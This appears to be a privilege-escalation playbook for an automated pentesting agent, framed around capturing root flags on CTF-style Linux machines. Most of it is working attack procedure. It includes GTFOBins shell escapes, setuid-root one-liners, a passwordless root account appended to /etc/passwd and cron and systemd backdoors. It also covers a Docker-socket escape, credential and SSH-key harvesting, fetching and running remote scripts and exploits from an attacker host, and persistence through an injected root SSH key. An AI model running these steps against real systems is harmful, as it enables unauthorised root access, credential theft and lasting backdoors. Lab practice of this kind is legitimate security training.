Privilege Escalation Knowledge Base
Purpose
This knowledge base provides comprehensive privilege escalation methodologies for Linux systems. It covers escalating from low-privilege users (www-data, user) to root, then capturing the root flag.
Layered Privilege Escalation Strategy
Core Principle: Escalate systematically through 3 layers - from quick wins to exhaustive enumeration.
Layer Framework:
Layer 1 (Quick Wins - Manual): - Check most common vectors immediately - Goal: Find easy privesc within 2-3 minutes - Focus: sudo -l, SUID, obvious misconfigurations - Time: 2-5 minutes Layer 2 (Deep Enumeration - Automated): - Run comprehensive enumeration tools - Goal: Find all possible privesc vectors - Focus: linpeas, linenum, pspy - Time: 5-15 minutes Layer 3 (Alternative Methods): - Try less common vectors or kernel exploits - Goal: Find overlooked or complex privesc paths - Focus: Kernel exploits, container escape, NFS, etc. - Time: Variable
Escalation Triggers:
- •Layer 1 finds nothing obvious → Run Layer 2 enumeration
- •Layer 2 finds vectors but exploitation fails → Try Layer 3 alternatives
- •Layer 3 fails → Re-examine reconnaissance, may have missed service/config
Core Strategy
Systematic execution:
- •Quick Wins (Layer 1): Check easy vectors first (sudo, SUID, capabilities)
- •Deep Enumeration (Layer 2): Use automated tools to find all vectors
- •Alternative Vectors (Layer 3): Kernel exploits, container escape, NFS
- •Exploitation: Execute chosen privesc method
- •Root Flag: Locate and read root.txt
- •Verification: Confirm root access with
id,whoami
Tools Available
Enumeration Scripts
- •
linpeas.sh- Comprehensive automated enumeration - •
linenum.sh- Alternative enumeration script - •
pspy- Monitor processes without root
Manual Commands
- •
sudo -l- Check sudo permissions - •
find / -perm -4000 2>/dev/null- Find SUID binaries - •
getcap -r / 2>/dev/null- Find capabilities - •
crontab -l- Check user cron jobs - •
cat /etc/crontab- Check system cron jobs
References
- •GTFOBins (https://gtfobins.github.io/) - SUID/sudo exploitation
- •PayloadsAllTheThings - Privesc cheatsheet
Enumeration Workflow
Phase 1: Quick Manual Checks
Execute these immediately:
# 1. Check current user and groups id groups # 2. Check sudo permissions (most common vector) sudo -l # 3. Check SUID binaries find / -perm -4000 -type f 2>/dev/null # 4. Check writable files in /etc find /etc -writable -type f 2>/dev/null # 5. Check for interesting files ls -la /home/*/ ls -la /root/ ls -la /opt/ ls -la /var/www/html/ # 6. Check running processes ps aux | grep root # 7. Check cron jobs cat /etc/crontab ls -la /etc/cron.* crontab -l # 8. Check capabilities getcap -r / 2>/dev/null
Phase 2: Automated Enumeration
Download and run linpeas:
# Download linpeas cd /tmp wget http://YOUR_IP:8000/linpeas.sh # Or curl http://YOUR_IP:8000/linpeas.sh -o linpeas.sh # Make executable chmod +x linpeas.sh # Run and save output ./linpeas.sh > linpeas-output.txt 2>&1 # Review output cat linpeas-output.txt | grep -i "PEASS\|password\|ssh\|priv"
If can't download, use one-liner:
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
Common Privilege Escalation Vectors
1. Sudo Abuse (Most Common)
# Check what you can run as root
sudo -l
# Common exploitable commands:
# - vim: sudo vim -c ':!/bin/sh'
# - nano: sudo nano, then Ctrl+R Ctrl+X, type: reset; sh 1>&0 2>&0
# - less: sudo less /etc/profile, then !sh
# - man: sudo man man, then !sh
# - find: sudo find . -exec /bin/sh \; -quit
# - awk: sudo awk 'BEGIN {system("/bin/sh")}'
# - perl: sudo perl -e 'exec "/bin/sh";'
# - python: sudo python -c 'import pty;pty.spawn("/bin/bash")'
# - git: sudo git -p help config, then !sh
# GTFOBins template:
# 1. Identify binary you can sudo
# 2. Search GTFOBins for that binary
# 3. Follow exploitation steps
2. SUID Binaries
# Find SUID binaries
find / -perm -4000 -type f 2>/dev/null
# Compare with standard SUID binaries
# Unusual ones are interesting
# Common exploitable SUID binaries:
# - /usr/bin/python
# - /usr/bin/perl
# - /usr/bin/php
# - /usr/bin/vim
# - /usr/bin/find
# - /usr/bin/nmap (old versions)
# - Custom binaries
# Exploitation examples:
# Python SUID
/usr/bin/python -c 'import os; os.setuid(0); os.system("/bin/sh")'
# Vim SUID
/usr/bin/vim -c ':py import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
# Find SUID
/usr/bin/find . -exec /bin/sh -p \; -quit
# Check GTFOBins for specific binary
3. Capabilities
# Find capabilities
getcap -r / 2>/dev/null
# Exploitable capabilities:
# - cap_setuid+ep on python/perl/ruby
# - cap_dac_read_search for reading any file
# Python with cap_setuid
/usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
# Perl with cap_setuid
/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash";'
4. Writable /etc/passwd
# Check if /etc/passwd is writable ls -la /etc/passwd # If writable, add root user echo 'hacker:$6$salt$hashedpassword:0:0:root:/root:/bin/bash' >> /etc/passwd # Or simpler (password: hacker) echo 'hacker::0:0:root:/root:/bin/bash' >> /etc/passwd # Login as new root user su hacker
5. Cron Jobs
# Check cron jobs cat /etc/crontab ls -la /etc/cron.* # Look for: # 1. Scripts run as root # 2. Writable by your user # If found writable script run by root echo '#!/bin/bash\nchmod +s /bin/bash' > /path/to/script.sh # Wait for cron to run (check schedule) # Then execute /bin/bash -p
6. Writable Service Files
# Check for writable systemd services find /etc/systemd/system/ -writable 2>/dev/null # If found, modify ExecStart [Service] ExecStart=/bin/bash -c 'chmod +s /bin/bash' # Restart service systemctl restart vulnerable.service # Execute SUID bash /bin/bash -p
7. Kernel Exploits (Last Resort)
# Check kernel version uname -a uname -r # Search for kernel exploits searchsploit "linux kernel $(uname -r)" searchsploit "ubuntu privilege escalation" # Common kernel exploits: # - DirtyCOW (CVE-2016-5195) # - Dirty Pipe (CVE-2022-0847) # - PwnKit (CVE-2021-4034) # Example: Dirty Pipe wget http://YOUR_IP:8000/dirtypipe.c gcc dirtypipe.c -o dirtypipe ./dirtypipe
8. Docker/Container Escape
# Check if in Docker ls -la /.dockerenv cat /proc/1/cgroup | grep docker # If docker socket is accessible find / -name docker.sock 2>/dev/null # If found /var/run/docker.sock docker run -v /:/mnt --rm -it alpine chroot /mnt sh # Or check for privileged container fdisk -l # If you can see host disks, you're privileged
9. Credentials in Files
# Search for passwords grep -r "password" /var/www/html/ 2>/dev/null grep -r "pass" /etc/ 2>/dev/null find / -name "*.config" -o -name "*.conf" 2>/dev/null | xargs grep -i "password" # Check history files cat ~/.bash_history cat /home/*/.bash_history 2>/dev/null # Check for SSH keys find / -name id_rsa 2>/dev/null find / -name authorized_keys 2>/dev/null # Database credentials cat /var/www/html/config.php cat /var/www/html/wp-config.php
10. NFS Exports
# Check NFS exports cat /etc/exports # If no_root_squash is set # Mount on attacker machine: mkdir /tmp/mount mount -t nfs TARGET:/share /tmp/mount # Create SUID binary as root on attacker cp /bin/bash /tmp/mount/bash chmod +s /tmp/mount/bash # Execute on target /share/bash -p
Exploitation Process
Step 1: Identify Vector
Based on enumeration, choose best vector:
- •Sudo permissions - Highest priority, usually easiest
- •SUID binaries - Check against GTFOBins
- •Capabilities - Less common but powerful
- •Cron jobs - May require waiting
- •Kernel exploits - Last resort, can crash system
Step 2: Execute Privesc
# Example: Sudo vim exploitation # 1. Verify you can run it sudo -l # Output: (root) NOPASSWD: /usr/bin/vim # 2. Execute vim as root sudo vim # 3. In vim, type: :set shell=/bin/bash :shell # 4. Verify root id # Output: uid=0(root) gid=0(root)
Step 3: Stabilize Root Access
Once root, ensure you can maintain access:
# Add SUID to bash (backup method) chmod +s /bin/bash # Or add SSH key mkdir -p /root/.ssh echo 'YOUR_PUBLIC_KEY' >> /root/.ssh/authorized_keys chmod 600 /root/.ssh/authorized_keys
Root Flag Capture
Locate Root Flag
# Common locations cat /root/root.txt cat /root/flag.txt # Search if not found find /root -name "*.txt" 2>/dev/null find / -name "root.txt" 2>/dev/null
Verify Flag Format
# Should be 32-character hex string
cat /root/root.txt | wc -c # Should be 33 (32 + newline)
cat /root/root.txt | grep -E '^[a-f0-9]{32}$'
Update State
# Save root flag ROOT_FLAG=$(cat /root/root.txt) echo "Root flag: $ROOT_FLAG" # Update state file (if accessible) jq --arg flag "$ROOT_FLAG" '.flags.root = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json
Troubleshooting
Can't Download Tools
# Method 1: Python HTTP server (on attacker) python3 -m http.server 8000 # Method 2: Base64 transfer # On attacker: base64 linpeas.sh | xclip -selection clipboard # On target: echo 'BASE64_STRING' | base64 -d > linpeas.sh # Method 3: Use built-in tools only # Manual enumeration with find, grep, etc.
No Write Permissions
# Try /tmp cd /tmp # Or /dev/shm cd /dev/shm # Or current user home cd ~
Stuck/No Vectors Found
# Re-run enumeration more carefully # Check linpeas output for anything yellow/red cat linpeas-output.txt | grep -E "PEASS|95%|99%" # Check for overlooked vectors: # 1. Environment variables with passwords env | grep -i "pass\|pwd\|key" # 2. Process command lines ps auxww | grep -i "password\|pass" # 3. World-writable scripts find / -perm -002 -type f 2>/dev/null # 4. Misconfigured files ls -la /etc/shadow /etc/passwd # 5. Backup files find / -name "*.bak" -o -name "*.backup" 2>/dev/null
Output Format
After successful privilege escalation:
{
"status": "root_access_gained",
"method": "Sudo vim exploitation via GTFOBins",
"vector": "sudo -l showed vim with NOPASSWD",
"root_flag": "f6e5d4c3b2a1098765432109876543210",
"exploitation_time": "2 minutes",
"mission_complete": true
}
Success Criteria
Mission complete when:
- •✅ Root access obtained (uid=0)
- •✅ Root flag located and read
- •✅ Flag is 32-character hexadecimal string
- •✅ Both user and root flags captured
- •✅ State file updated with both flags
Decision Tree
Initial Access Gained │ ├─ Run: sudo -l │ ├─ Can sudo something? → GTFOBins → Root │ └─ No sudo → Continue │ ├─ Find SUID binaries │ ├─ Found unusual SUID? → GTFOBins → Root │ └─ No exploitable SUID → Continue │ ├─ Check capabilities │ ├─ cap_setuid on python/perl? → Exploit → Root │ └─ No caps → Continue │ ├─ Check cron jobs │ ├─ Writable script run as root? → Backdoor → Wait → Root │ └─ No cron → Continue │ ├─ Run linpeas │ └─ Follow red/yellow findings │ └─ Kernel exploit (last resort) └─ Search and compile exploit
Key Principles
- •Systematic approach - Don't skip steps, check everything
- •Quick wins first - sudo before kernel exploits
- •GTFOBins is your friend - Use it for SUID/sudo
- •Verify before claiming - Ensure you have actual root
- •Capture the flag - Read root.txt content, not just location
- •Non-interactive aware - Some exploits need TTY, adapt accordingly
Remember
- •Most playground machines have obvious privesc vectors
- •Sudo misconfigurations are most common
- •SUID binaries are second most common
- •Kernel exploits are rarely needed in playgrounds
- •The root flag MUST be read - don't declare success without it
- •Document successful method for learning and future reference
Mission Complete
When you can execute:
# whoami root # cat /root/root.txt a1b2c3d4e5f6789... (32-char hex)
Mission accomplished! Update coordinator with both flags.